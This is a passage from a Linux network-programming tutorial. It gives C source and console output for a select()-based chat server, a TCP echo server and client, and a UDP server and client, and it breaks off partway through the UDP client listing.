9. Example: Receiving a multicast datagram, a client

Example: The select() server

The following program example acts like a simple multi-user chat server. Start running it in one window, then telnet to it ("telnet hostname 2020") from other windows. When you type something in one telnet session, it should appear in all the other windows.

/*******select.c*********/
/*******Using select() for I/O multiplexing */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* port we're listening on */
#define PORT 2020

int main(int argc, char *argv[])
{
    /* master file descriptor list */
    fd_set master;
    /* temp file descriptor list for select() */
    fd_set read_fds;
    /* server address */
    struct sockaddr_in serveraddr;
    /* client address */
    struct sockaddr_in clientaddr;
    /* maximum file descriptor number */
    int fdmax;
    /* listening socket descriptor */
    int listener;
    /* newly accept()ed socket descriptor */
    int newfd;
    /* buffer for client data */
    char buf[1024];
    int nbytes;
    /* for setsockopt() SO_REUSEADDR, below */

    int yes = 1;
    /* accept() expects a socklen_t, not an int */
    socklen_t addrlen;
    int i, j;

    /* clear the master and temp sets */
    FD_ZERO(&master);
    FD_ZERO(&read_fds);

    /* get the listener */
    if((listener = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        perror("Server-socket() error lol!");
        /* just exit lol! */
        exit(1);
    }
    printf("Server-socket() is OK...\n");

    /* avoid the "address already in use" error message */
    if(setsockopt(listener, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
    {
        perror("Server-setsockopt() error lol!");
        exit(1);
    }
    printf("Server-setsockopt() is OK...\n");

    /* bind */
    serveraddr.sin_family = AF_INET;
    serveraddr.sin_addr.s_addr = INADDR_ANY;
    serveraddr.sin_port = htons(PORT);
    memset(&(serveraddr.sin_zero), '\0', 8);

    if(bind(listener, (struct sockaddr *)&serveraddr, sizeof(serveraddr)) == -1)
    {
        perror("Server-bind() error lol!");
        exit(1);
    }
    printf("Server-bind() is OK...\n");

    /* listen */
    if(listen(listener, 10) == -1)
    {
        perror("Server-listen() error lol!");
        exit(1);
    }
    printf("Server-listen() is OK...\n");

    /* add the listener to the master set */
    FD_SET(listener, &master);
    /* keep track of the biggest file descriptor */
    fdmax = listener; /* so far, it's this one */

    /* loop */
    for(;;)
    {
        /* copy it */
        read_fds = master;

        if(select(fdmax+1, &read_fds, NULL, NULL, NULL) == -1)
        {
            perror("Server-select() error lol!");
            exit(1);
        }
        printf("Server-select() is OK...\n");

        /* run through the existing connections looking for data to be read */
        for(i = 0; i <= fdmax; i++)
        {
            if(FD_ISSET(i, &read_fds))
            {
                /* we got one... */
                if(i == listener)
                {
                    /* handle new connections */
                    addrlen = sizeof(clientaddr);
                    if((newfd = accept(listener, (struct sockaddr *)&clientaddr, &addrlen)) == -1)
                    {
                        perror("Server-accept() error lol!");
                    }
                    else
                    {
                        printf("Server-accept() is OK...\n");
                        FD_SET(newfd, &master); /* add to master set */
                        if(newfd > fdmax)
                        {
                            /* keep track of the maximum */
                            fdmax = newfd;
                        }
                        printf("%s: New connection from %s on socket %d\n", argv[0], inet_ntoa(clientaddr.sin_addr), newfd);
                    }
                }
                else
                {
                    /* handle data from a client */
                    if((nbytes = recv(i, buf, sizeof(buf), 0)) <= 0)
                    {
                        /* got error or connection closed by client */
                        if(nbytes == 0)
                            /* connection closed */
                            printf("%s: socket %d hung up\n", argv[0], i);
                        else
                            perror("recv() error lol!");
                        /* close it... */
                        close(i);
                        /* remove from master set */
                        FD_CLR(i, &master);
                    }
                    else
                    {
                        /* we got some data from a client */
                        for(j = 0; j <= fdmax; j++)
                        {
                            /* send to everyone! */
                            if(FD_ISSET(j, &master))
                            {
                                /* except the listener and ourselves */
                                if(j != listener && j != i)
                                {
                                    if(send(j, buf, nbytes, 0) == -1)
                                        perror("send() error lol!");
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    return 0;
}

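The fan-out step at the end of the listing can also be pulled out into a function of its own, which makes it easier to test. The sketch below is one possible shape for it; broadcast_to_others() and its return value (the number of descriptors written to) are assumptions introduced here, not part of select.c.

```c
#include <stdio.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>

/* broadcast_to_others() is a hypothetical helper.
 * It sends buf to every descriptor in the master set except the
 * listener and the sender, and returns how many sends succeeded. */
int broadcast_to_others(fd_set *master, int fdmax, int listener,
                        int sender, const char *buf, size_t len)
{
    int delivered = 0;
    int j;

    for (j = 0; j <= fdmax; j++) {
        if (!FD_ISSET(j, master))
            continue;                   /* not a tracked descriptor */
        if (j == listener || j == sender)
            continue;                   /* skip listener and ourselves */
        if (send(j, buf, len, 0) == -1)
            perror("send");
        else
            delivered++;
    }
    return delivered;
}
```

Inside the server loop, the call would look like broadcast_to_others(&master, fdmax, listener, i, buf, nbytes).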
Compile and link the program.

[bodo@bakawali testsocket]$ gcc -g select.c -o select

Run the program.

[bodo@bakawali testsocket]$ ./select
Server-socket() is OK...
Server-setsockopt() is OK...
Server-bind() is OK...
Server-listen() is OK...

You can leave the program running in the background (suspend it with Ctrl+Z, then type bg).

[bodo@bakawali testsocket]$ ./select
Server-socket() is OK...
Server-setsockopt() is OK...
Server-bind() is OK...
Server-listen() is OK...

[1]+  Stopped                 ./select
[bodo@bakawali testsocket]$ bg
[1]+ ./select &
[bodo@bakawali testsocket]$

Do some verification.

[bodo@bakawali testsocket]$ ps aux | grep select
bodo     27474  0.0  0.2   1384   292 pts/2    S+   14:32   0:00 ./select
bodo     27507  0.0  0.5   3724   668 pts/3    S+   14:34   0:00 grep select
[bodo@bakawali testsocket]$ netstat -a | grep 2020
tcp        0      0 *:2020                  *:*                     LISTEN
[bodo@bakawali testsocket]$

Telnet from other computers or windows using the hostname or the IP address. Here we use the hostname, bakawali. Use the escape character ( Ctrl + ] ) to get the telnet command prompt. For other telnet commands, type help.

[bodo@bakawali testsocket]$ telnet bakawali 2020
Trying 203.106.93.94...
Connected to bakawali.jmti.gov.my (203.106.93.94).
Escape character is '^]'.
^]
telnet> mode line
testing
some text
the most visible one

The last two messages were typed at two other machines, connected through sockets 5 and 6 using telnet (socket 4 is another window on the server). Sockets 5 and 6 are from Windows 2000 Server machines. The messages on the server console are shown below.

[bodo@bakawali testsocket]$ Server-select() is OK...
Server-accept() is OK...
./select: New connection from 203.106.93.94 on socket 4
Server-select() is OK...
...
Server-accept() is OK...
./select: New connection from 203.106.93.91 on socket 5
Server-select() is OK...
Server-select() is OK...
...
Server-select() is OK...
Server-select() is OK...
Server-accept() is OK...
./select: New connection from 203.106.93.82 on socket 6

When the clients on sockets 4, 5 and 6 disconnect from the server, the following messages appear on the server console.

...
Server-select() is OK...
Server-select() is OK...
./select: socket 5 hung up
Server-select() is OK...
./select: socket 6 hung up
Server-select() is OK...
./select: socket 4 hung up

There are two file descriptor sets in the code: master and read_fds. The first, master, holds all the socket descriptors that are currently connected, as well as the socket descriptor that is listening for new connections. We need the master set because select() modifies the set you pass to it so that it reflects which sockets are ready to read. Since we have to keep track of the connections from one call of select() to the next, we must store them safely somewhere. At the last minute, we copy master into read_fds and then call select(). Every time we get a new connection we add it to the master set, and every time a connection closes we remove it from the master set.

Notice that we check whether the listener socket is ready to read. When it is, a new connection is pending, so we accept() it and add it to the master set. Similarly, when a client connection is ready to read and recv() returns 0, we know that the client has closed the connection, and we must remove it from the master set. If recv() on a client socket returns a positive value, some data has been received (a negative value means an error). So we take the data, then go through the master list and send it to all the other connected clients.

Connecting a TCP server and client

The following program examples are connection-oriented: the sockets use TCP to connect a server to a client, and a client to a server. This example shows a more complete use of the sockets API.

Example: Connecting a TCP server to a client, a server program

/************tcpserver.c************************/
/* Header files needed to use the sockets API. */
/* They contain the macro, data type and       */
/* structure definitions.                      */
/***********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>    /* inet_ntoa() */
#include <errno.h>
#include <unistd.h>

/* BufferLength is 100 bytes */
#define BufferLength 100
/* Server port number */
#define SERVPORT 3111

int main(void)
{
    /* Variable and structure definitions. */
    int sd, sd2, rc;
    int temp;                         /* SO_ERROR is returned as an int */
    socklen_t length = sizeof(temp);
    socklen_t sin_size = sizeof(struct sockaddr_in);
    int totalcnt = 0, on = 1;
    char buffer[BufferLength];
    struct sockaddr_in serveraddr;
    struct sockaddr_in their_addr;
    fd_set read_fd;
    struct timeval timeout;

    timeout.tv_sec = 15;
    timeout.tv_usec = 0;

    /* The socket() function returns a socket descriptor */
    /* representing an endpoint. The statement also */
    /* identifies that the INET (Internet Protocol) */
    /* address family with the TCP transport (SOCK_STREAM) */
    /* will be used for this socket. */
    /* Get a socket descriptor */
    if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        perror("Server-socket() error");
        /* Just exit */
        exit(-1);
    }
    else
        printf("Server-socket() is OK\n");

    /* The setsockopt() function is used to allow */
    /* the local address to be reused when the server */
    /* is restarted before the required wait time */
    /* expires. */
    /* Allow socket descriptor to be reusable */
    if((rc = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on))) < 0)
    {
        perror("Server-setsockopt() error");
        close(sd);
        exit(-1);
    }
    else
        printf("Server-setsockopt() is OK\n");

    /* bind to an address */
    memset(&serveraddr, 0x00, sizeof(struct sockaddr_in));
    serveraddr.sin_family = AF_INET;
    serveraddr.sin_port = htons(SERVPORT);
    serveraddr.sin_addr.s_addr = htonl(INADDR_ANY);
    printf("Using %s, listening at %d\n", inet_ntoa(serveraddr.sin_addr), SERVPORT);

    /* After the socket descriptor is created, a bind() */
    /* function gets a unique name for the socket. */
    /* In this example, s_addr is set to zero (INADDR_ANY), */
    /* so the server accepts connections to port 3111 */
    /* on any of its local addresses. */
    if((rc = bind(sd, (struct sockaddr *)&serveraddr, sizeof(serveraddr))) < 0)
    {
        perror("Server-bind() error");
        /* Close the socket descriptor */
        close(sd);
        /* and just exit */
        exit(-1);
    }
    else
        printf("Server-bind() is OK\n");

    /* The listen() function allows the server to accept */
    /* incoming client connections. In this example, */
    /* the backlog is set to 10. This means that the */
    /* system can queue up to 10 connection requests before */
    /* the system starts rejecting incoming requests. */
    /* Up to 10 clients can be queued */
    if((rc = listen(sd, 10)) < 0)
    {
        perror("Server-listen() error");
        close(sd);
        exit(-1);
    }
    else
        printf("Server-Ready for client connection...\n");

    /* The server will accept a connection request */
    /* with this accept() function, provided the */
    /* connection request does the following: */
    /* - Is part of the same address family */
    /* - Uses streams sockets (TCP) */
    /* - Attempts to connect to the specified port */
    /* accept() the incoming connection request. */
    if((sd2 = accept(sd, (struct sockaddr *)&their_addr, &sin_size)) < 0)
    {
        perror("Server-accept() error");
        close(sd);
        exit(-1);
    }
    else
        printf("Server-accept() is OK\n");

    /* client IP */
    printf("Server-new socket, sd2 is OK...\n");
    printf("Got connection from the f***ing client: %s\n", inet_ntoa(their_addr.sin_addr));

    /* The select() function allows the process to */
    /* wait for an event to occur and to wake up */
    /* the process when the event occurs. In this */
    /* example, the system notifies the process */
    /* only when data is available to read. */
    /* Wait for up to 15 seconds on */
    /* select() for data to be read. */
    FD_ZERO(&read_fd);
    FD_SET(sd2, &read_fd);
    rc = select(sd2 + 1, &read_fd, NULL, NULL, &timeout);
    if((rc == 1) && (FD_ISSET(sd2, &read_fd)))
    {
        /* Read data from the client. */
        totalcnt = 0;
        while(totalcnt < BufferLength)
        {
            /* When select() indicates that there is data */
            /* available, use the read() function to read */
            /* 100 bytes of the string that the */
            /* client sent. */
            /* read() from client */
            rc = read(sd2, &buffer[totalcnt], (BufferLength - totalcnt));
            if(rc < 0)
            {
                perror("Server-read() error");
                close(sd);
                close(sd2);
                exit(-1);
            }
            else if(rc == 0)
            {
                printf("Client program has issued a close()\n");
                close(sd);
                close(sd2);
                exit(-1);
            }
            else
            {
                totalcnt += rc;
                printf("Server-read() is OK\n");
            }
        }
    }
    else if(rc < 0)
    {
        perror("Server-select() error");
        close(sd);
        close(sd2);
        exit(-1);
    }
    /* rc == 0 */
    else
    {
        printf("Server-select() timed out.\n");
        close(sd);
        close(sd2);
        exit(-1);
    }

    /* Show the data. The buffer is not guaranteed to be */
    /* NUL-terminated, so limit the print to totalcnt bytes. */
    printf("Received data from the f***ing client: %.*s\n", totalcnt, buffer);

    /* Echo the bytes back to the client */
    /* by using the write() function. */
    printf("Server-Echoing back to client...\n");
    rc = write(sd2, buffer, totalcnt);
    if(rc != totalcnt)
    {
        perror("Server-write() error");
        /* Get the error number. */
        rc = getsockopt(sd2, SOL_SOCKET, SO_ERROR, &temp, &length);
        if(rc == 0)
        {
            /* Print out the asynchronously */
            /* received error. */
            errno = temp;
            perror("SO_ERROR was");
        }
        close(sd);
        close(sd2);
        exit(-1);
    }

    /* When the data has been sent, close() */
    /* the socket descriptor that was returned */
    /* from accept() and close() the */
    /* original (listening) socket descriptor. */
    close(sd2);
    close(sd);
    return 0;
}

Compile and link the program. Make sure there is no error.

[bodo@bakawali testsocket]$ gcc -g tcpserver.c -o tcpserver

Run the program. In this example we let the program run in the background.

[bodo@bakawali testsocket]$ ./tcpserver
Server-socket() is OK
Server-setsockopt() is OK
Using 0.0.0.0, listening at 3111
Server-bind() is OK
Server-Ready for client connection...

[1]+  Stopped                 ./tcpserver
[bodo@bakawali testsocket]$ bg
[1]+ ./tcpserver &
[bodo@bakawali testsocket]$

Do some verification.

[bodo@bakawali testsocket]$ ps aux | grep tcpserver
bodo  7914  0.0  0.2  3172  324  pts/3  S   11:59  0:00  ./tcpserver
bodo  7921  0.0  0.5  5540  648  pts/3  S+  12:01  0:00  grep tcpserver
[bodo@bakawali testsocket]$ netstat -a | grep 3111
tcp        0      0 *:3111        *:*        LISTEN

When the next program example (the TCP client) is run, the following messages should be expected at the server console.

[bodo@bakawali testsocket]$ Server-accept() is OK
Server-new socket, sd2 is OK...
Got connection from the f***ing client: 203.106.93.94
Server-read() is OK
Received data from the f***ing client: This is a test string from client lol!!!
Server-Echoing back to client...

[1]+  Done                    ./tcpserver
[bodo@bakawali testsocket]$

If the server program is run in the foreground and the client is then run, the following messages should be expected at the server console.

[bodo@bakawali testsocket]$ ./tcpserver
Server-socket() is OK
Server-setsockopt() is OK
Using 0.0.0.0, listening at 3111
Server-bind() is OK
Server-Ready for client connection...
Server-accept() is OK
Server-new socket, sd2 is OK...
Got connection from the f***ing client: 203.106.93.94
Server-read() is OK
Received data from the f***ing client: This is a test string from client lol!!!
Server-Echoing back to client...
[bodo@bakawali testsocket]$
Now just telnet to the server.

[bodo@bakawali testsocket]$ telnet 203.106.93.94 3111
Trying 203.106.93.94...
Connected to bakawali.jmti.gov.my (203.106.93.94).
Escape character is '^]'.
^]
telnet> help
Commands may be abbreviated. Commands are:

close      close current connection
logout     forcibly logout remote user and close the connection
display    display operating parameters
mode       try to enter line or character mode ('mode ?' for more)
open       connect to a site
quit       exit telnet
send       transmit special characters ('send ?' for more)
set        set operating parameters ('set ?' for more)
unset      unset operating parameters ('unset ?' for more)
status     print status information
toggle     toggle operating parameters ('toggle ?' for more)
slc        change state of special charaters ('slc ?' for more)
auth       turn on (off) authentication ('auth ?' for more)
encrypt    turn on (off) encryption ('encrypt ?' for more)
forward    turn on (off) credential forwarding ('forward ?' for more)
z          suspend telnet
!          invoke a subshell
environ    change environment variables ('environ ?' for more)
?          print help information
telnet> quit

Well, it looks like we have had a telnet session with the server.

NETWORK PROGRAMMING LINUX SOCKET PART 11: TCP CLIENT-SERVER CODE SAMPLE

The working program examples, if any, were compiled using gcc, tested using public IPs and run on Linux Fedora Core 3 (updated several times) as a normal user. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to its default configuration. All the program examples are generic. Beware of code that spans more than one line.

Example: Connecting a TCP client to a server, a client program

Let us try the client program that will connect to the previous server program. The following example shows how to connect a client socket program to a connection-oriented server.

/************tcpclient.c************************/
/* Header files needed to use the sockets API. */
/* They contain the macro, data type and       */
/* structure definitions along with the        */
/* function prototypes.                        */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>

/* BufferLength is 100 bytes */
#define BufferLength 100
/* Default host name of server system. Change it to your default */
/* server hostname or IP. If the user does not supply the hostname */
/* as an argument, The_server_name_or_IP will be used as default */
#define SERVER "The_server_name_or_IP"
/* Server's port number */
#define SERVPORT 3111

/* Pass in 1 parameter which is either the */
/* address or host name of the server, or */
/* set the server name in the #define SERVER ... */
int main(int argc, char *argv[])
{
    /* Variable and structure definitions. */
    int sd, rc;
    int temp;                         /* SO_ERROR is returned as an int */
    socklen_t length = sizeof(temp);
    struct sockaddr_in serveraddr;
    char buffer[BufferLength];
    char server[255];
    int totalcnt = 0;
    struct hostent *hostp;
    char data[100] = "This is a test string from client lol!!! ";

    /* The socket() function returns a socket */
    /* descriptor representing an endpoint. */
    /* The statement also identifies that the */
    /* INET (Internet Protocol) address family */
    /* with the TCP transport (SOCK_STREAM) */
    /* will be used for this socket. */
    /* get a socket descriptor */
    if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        perror("Client-socket() error");
        exit(-1);
    }
    else
        printf("Client-socket() OK\n");

    /* If the server hostname is supplied */
    if(argc > 1)
    {
        /* Use the supplied argument; snprintf() cannot overflow server[] */
        snprintf(server, sizeof(server), "%s", argv[1]);
        printf("Connecting to the f***ing %s, port %d ...\n", server, SERVPORT);
    }
    else
        /* Use the default server name or IP */
        snprintf(server, sizeof(server), "%s", SERVER);

    memset(&serveraddr, 0x00, sizeof(struct sockaddr_in));
    serveraddr.sin_family = AF_INET;
    serveraddr.sin_port = htons(SERVPORT);

    if((serveraddr.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE)
    {
        /* When passing the host name of the server as a */
        /* parameter to this program, use the gethostbyname() */
        /* function to retrieve the address of the host server. */
        /* get host address */
        hostp = gethostbyname(server);
        if(hostp == (struct hostent *)NULL)
        {
            printf("HOST NOT FOUND --> ");
            /* h_errno is usually defined */
            /* in netdb.h */
            printf("h_errno = %d\n", h_errno);
            printf("---This is a client program---\n");
            printf("Command usage: %s <server name or IP>\n", argv[0]);
            close(sd);
            exit(-1);
        }
        memcpy(&serveraddr.sin_addr, hostp->h_addr, sizeof(serveraddr.sin_addr));
    }

    /* After the socket descriptor is received, the */
    /* connect() function is used to establish a */
    /* connection to the server. */
    /* connect() to server. */
    if((rc = connect(sd, (struct sockaddr *)&serveraddr, sizeof(serveraddr))) < 0)
    {
        perror("Client-connect() error");
        close(sd);
        exit(-1);
    }
    else
        printf("Connection established...\n");

    /* Send string to the server using */
    /* the write() function. */
    /* Write() some string to the server. */
    printf("Sending some string to the f***ing %s...\n", server);
    rc = write(sd, data, sizeof(data));
    if(rc < 0)
    {
        perror("Client-write() error");
        rc = getsockopt(sd, SOL_SOCKET, SO_ERROR, &temp, &length);
        if(rc == 0)
        {
            /* Print out the asynchronously received error. */
            errno = temp;
            perror("SO_ERROR was");
        }
        close(sd);
        exit(-1);
    }
    else
    {
        printf("Client-write() is OK\n");
        printf("String successfully sent lol!\n");
        printf("Waiting the %s to echo back...\n", server);
    }

    totalcnt = 0;
    while(totalcnt < BufferLength)
    {
        /* Wait for the server to echo the */
        /* string by using the read() function. */
        /* Read data from the server. */
        rc = read(sd, &buffer[totalcnt], BufferLength - totalcnt);
        if(rc < 0)
        {
            perror("Client-read() error");
            close(sd);
            exit(-1);
        }
        else if(rc == 0)
        {
            printf("Server program has issued a close()\n");
            close(sd);
            exit(-1);
        }
        else
            totalcnt += rc;
    }
    printf("Client-read() is OK\n");
    /* The buffer is not guaranteed to be NUL-terminated, */
    /* so limit the print to totalcnt bytes. */
    printf("Echoed data from the f***ing server: %.*s\n", totalcnt, buffer);

    /* When the data has been read, close() */
    /* the socket descriptor. */
    /* Close socket descriptor from client side. */
    close(sd);
    return 0;
}
Compile and link the client program.

[bodo@bakawali testsocket]$ gcc -g tcpclient.c -o tcpclient

Run the program. Before that, do not forget to run the server program first. The first run is without the server hostname/IP.

[bodo@bakawali testsocket]$ ./tcpclient
Client-socket() OK
HOST NOT FOUND --> h_errno = 1
---This is a client program---
Command usage: ./tcpclient <server name or IP>
[bodo@bakawali testsocket]$

Then run with the server hostname or IP.

[bodo@bakawali testsocket]$ ./tcpclient 203.106.93.94
Client-socket() OK
Connecting to the f***ing 203.106.93.94, port 3111 ...
Connection established...
Sending some string to the f***ing 203.106.93.94...
Client-write() is OK
String successfully sent lol!
Waiting the 203.106.93.94 to echo back...
Client-read() is OK
Echoed data from the f***ing server: This is a test string from client lol!!!
[bodo@bakawali testsocket]$

And the messages at the server console.

[bodo@bakawali testsocket]$ ./tcpserver
Server-socket() is OK
Server-setsockopt() is OK
Using 0.0.0.0, listening at 3111
Server-bind() is OK
Server-Ready for client connection...
Server-accept() is OK
Server-new socket, sd2 is OK...
Got connection from the f***ing client: 203.106.93.94
Server-read() is OK
Received data from the f***ing client: This is a test string from client lol!!!
Server-Echoing back to client...
[bodo@bakawali testsocket]$

Well, it works!

UDP connectionless client/server

The connectionless protocol server and client examples illustrate the socket APIs that are written for the User Datagram Protocol (UDP). The server and client examples use the following sequence of function calls:

1. socket()
2. bind()

The following figure illustrates the client/server relationship of the socket APIs for a connectionless protocol.

Figure 1: UDP connectionless APIs relationship.

Connecting a UDP server and client

The following examples show how to use UDP to connect a server to a connectionless client, and a connectionless client to a server.

Example: Connecting a UDP server to a client, a server program

The first example shows how to use UDP to connect a connectionless server socket program to a client.

/*******************udpserver.c*****************/
/* Header files needed to use the sockets API. */
/* They contain the macro, data type and       */
/* structure definitions along with the        */
/* function prototypes.                        */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>       /* close() */

/* Server's port number, listen at 3333 */
#define SERVPORT 3333

/* Run the server without argument */
int main(int argc, char *argv[])
{
    /* Variable and structure definitions. */
    int sd, rc;
    struct sockaddr_in serveraddr, clientaddr;
    socklen_t clientaddrlen = sizeof(clientaddr);
    socklen_t serveraddrlen = sizeof(serveraddr);
    char buffer[100];
    char *bufptr = buffer;
    int buflen = sizeof(buffer);

    /* The socket() function returns a socket */
    /* descriptor representing an endpoint. */
    /* The statement also identifies that the */
    /* INET (Internet Protocol) address family */
    /* with the UDP transport (SOCK_DGRAM) will */
    /* be used for this socket. */
    /* get a socket descriptor */
    if((sd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
    {
        perror("UDP server - socket() error");
        exit(-1);
    }
    else
        printf("UDP server - socket() is OK\n");

    printf("UDP server - try to bind...\n");

    /* After the socket descriptor is received, */
    /* a bind() is done to assign a unique name */
    /* to the socket. In this example, s_addr is */
    /* set to zero (INADDR_ANY), so the server */
    /* receives datagrams sent to port 3333 on */
    /* any of its local addresses. */
    /* bind to address */
    memset(&serveraddr, 0x00, serveraddrlen);
    serveraddr.sin_family = AF_INET;
    serveraddr.sin_port = htons(SERVPORT);
    serveraddr.sin_addr.s_addr = htonl(INADDR_ANY);
    if((rc = bind(sd, (struct sockaddr *)&serveraddr, serveraddrlen)) < 0)
    {
        perror("UDP server - bind() error");
        close(sd);
        /* If something is wrong with bind(), just exit */
        exit(-1);
    }
    else
        printf("UDP server - bind() is OK\n");

    printf("Using IP %s and port %d\n", inet_ntoa(serveraddr.sin_addr), SERVPORT);
    printf("UDP server - Listening...\n");

    /* Use the recvfrom() function to receive the */
    /* data. The recvfrom() function waits */
    /* indefinitely for data to arrive. */
    /* This example does not use flags that control */
    /* the reception of the data. */
    /* Wait on client requests. */
    rc = recvfrom(sd, bufptr, buflen, 0, (struct sockaddr *)&clientaddr, &clientaddrlen);
    if(rc < 0)
    {
        perror("UDP Server - recvfrom() error");
        close(sd);
        exit(-1);
    }
    else
        printf("UDP Server - recvfrom() is OK...\n");

    /* Print at most rc bytes: the datagram is not */
    /* guaranteed to be NUL-terminated. */
    printf("UDP Server received the following:\n \"%.*s\" message\n", rc, bufptr);
    printf("from port %d and address %s.\n", ntohs(clientaddr.sin_port), inet_ntoa(clientaddr.sin_addr));

    /* Send a reply by using the sendto() function. */
    /* In this example, the system echoes the received */
    /* data back to the client. */
    /* This example does not use flags that control */
    /* the transmission of the data. */
    /* Send a reply, just echo the rc bytes of the request */
    printf("UDP Server replying to the stupid UDP client...\n");
    rc = sendto(sd, bufptr, rc, 0, (struct sockaddr *)&clientaddr, clientaddrlen);
    if(rc < 0)
    {
        perror("UDP server - sendto() error");
        close(sd);
        exit(-1);
    }
    else
        printf("UDP Server - sendto() is OK...\n");

    /* When the data has been sent, close() the */
    /* socket descriptor. */
    close(sd);
    return 0;
}
Compile and link the UDP server program.

[bodo@bakawali testsocket]$ gcc -g udpserver.c -o udpserver

Run the program and let it run in the background.

[bodo@bakawali testsocket]$ ./udpserver
UDP server - socket() is OK
UDP server - try to bind...
UDP server - bind() is OK
Using IP 0.0.0.0 and port 3333
UDP server - Listening...

[1]+  Stopped                 ./udpserver
[bodo@bakawali testsocket]$ bg
[1]+ ./udpserver &
[bodo@bakawali testsocket]$

Verify that the program is running.

[bodo@bakawali testsocket]$ ps aux | grep udpserver
bodo  7963  0.0  0.2  2240  324  pts/2  S   12:22  0:00  ./udpserver
bodo  7965  0.0  0.5  4324  648  pts/2  S+  12:24  0:00  grep udpserver

Verify that the UDP server is bound to port 3333 and waiting for client datagrams.

[bodo@bakawali testsocket]$ netstat -a | grep 3333
udp        0      0 *:3333        *:*
[bodo@bakawali testsocket]$

Without the client program (next example) you can try to telnet to the server on port 3333 as a test. Telnet uses TCP, and nothing is listening on TCP port 3333, so the session cannot be established with this UDP (connectionless) server.

[bodo@bakawali testsocket]$ telnet 203.106.93.94 3333
Trying 203.106.93.94...
telnet: connect to address 203.106.93.94: Connection refused
telnet: Unable to connect to remote host: Connection refused

Example: Connecting a UDP client to a server, a client program

The following example shows how to use UDP to connect a connectionless client socket program to a server. This program will be used to connect to the previous UDP server.

/****************udpclient.c********************/
/* Header files needed to use the sockets API. */
/* They contain the macro, data type and       */
/* structure definitions along with the        */
/* function prototypes.                        */
/***********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>       /* close() */

/* Host name of my system, change accordingly */
/* Put the server hostname that runs the UDP server program */
/* This will be used as default UDP server for client connection */
#define SERVER "bakawali"
/* Server's port number */
#define SERVPORT 3333

/* Pass in 1 argument (argv[1]) which is either the */
/* address or host name of the server, or */
/* set the server name in the #define SERVER above. */
int main(int argc, char *argv[])
{
    /* Variable and structure definitions. */
    int sd, rc;
    struct sockaddr_in serveraddr;
    socklen_t serveraddrlen = sizeof(serveraddr);
    char server[255];
    char buffer[100];
    char *bufptr = buffer;
    int buflen = sizeof(buffer);
    struct hostent *hostp;

    memset(buffer, 0x00, sizeof(buffer));
    /* 36 characters + terminating NUL */
    memcpy(buffer, "Hello! A client request message lol!", 37);

    /* The socket() function returns a socket */
    /* descriptor representing an endpoint. */
    /* The statement also identifies that the */
    /* INET (Internet Protocol) address family */
    /* with the UDP transport (SOCK_DGRAM) will */
    /* be used for this socket. */
    /* get a socket descriptor */
    if((sd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
    {
        perror("UDP Client - socket() error");
        /* Just exit */
        exit(-1);
    }
    else
        printf("UDP Client - socket() is OK!\n");

    /* If the hostname/IP of the server is supplied */
    /* Or if(argc == 2) */
    if(argc > 1)
        /* snprintf() cannot overflow server[] */
        snprintf(server, sizeof(server), "%s", argv[1]);
    else
    {
        /* Use default hostname or IP */
        printf("UDP Client - Usage %s <Server hostname or IP>\n", argv[0]);
        printf("UDP Client - Using default hostname/IP!\n");
        snprintf(server, sizeof(server), "%s", SERVER);
    }

    memset(&serveraddr, 0x00, sizeof(struct sockaddr_in));
    serveraddr.sin_family = AF_INET;
    serveraddr.sin_port = htons(SERVPORT);

    if((serveraddr.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE)
    {
        /* Use the gethostbyname() function to retrieve */
        /* the address of the host server if the system */
        /* passed the host name of the server as a parameter. */
        /* get server address */
        hostp = gethostbyname(server);
        if(hostp == (struct hostent *)NULL)
        {
            printf("HOST NOT FOUND --> ");
            /* h_errno is usually defined */
            /* in netdb.h */
            printf("h_errno = %d\n", h_errno);
            close(sd);
            exit(-1);
        }
        else
        {
            printf("UDP Client - gethostname() of the server is OK... \n");
            printf("Connected to UDP server %s on port %d.\n", server, SERVPORT);
        }
        memcpy(&serveraddr.sin_addr, hostp->h_addr, sizeof(serveraddr.sin_addr));
    }

    /* Use the sendto() function to send the data */
    /* to the server. */
    /* This example does not use flags that control */
    /* the transmission of the data. */
    /* send request to server */
    rc = sendto(sd, bufptr, buflen, 0, (struct sockaddr *)&serveraddr, sizeof(serveraddr));
    if(rc < 0)
    {
        perror("UDP Client - sendto() error");
        close(sd);
        exit(-1);
    }
    else
    {
        printf("UDP Client - sendto() is OK!\n");
        printf("Waiting a reply from UDP server...\n");
    }

    /* Use the recvfrom() function to receive the */
    /* data back from the server. */
    /* This example does not use flags that control */
    /* the reception of the data. */
    /* Read server reply. */
    /* Note: serveraddr is reset on the recvfrom() function. */
    rc = recvfrom(sd, bufptr, buflen, 0, (struct sockaddr *)&serveraddr, &serveraddrlen);
    if(rc < 0)
    {
        perror("UDP Client - recvfrom() error");
        close(sd);
        exit(-1);
    }
    else
    {
        /* Print at most rc bytes of the reply. */
        printf("UDP client received the following: \"%.*s\" message\n", rc, bufptr);
        printf(" from port %d, address %s\n", ntohs(serveraddr.sin_port), inet_ntoa(serveraddr.sin_addr));
    }

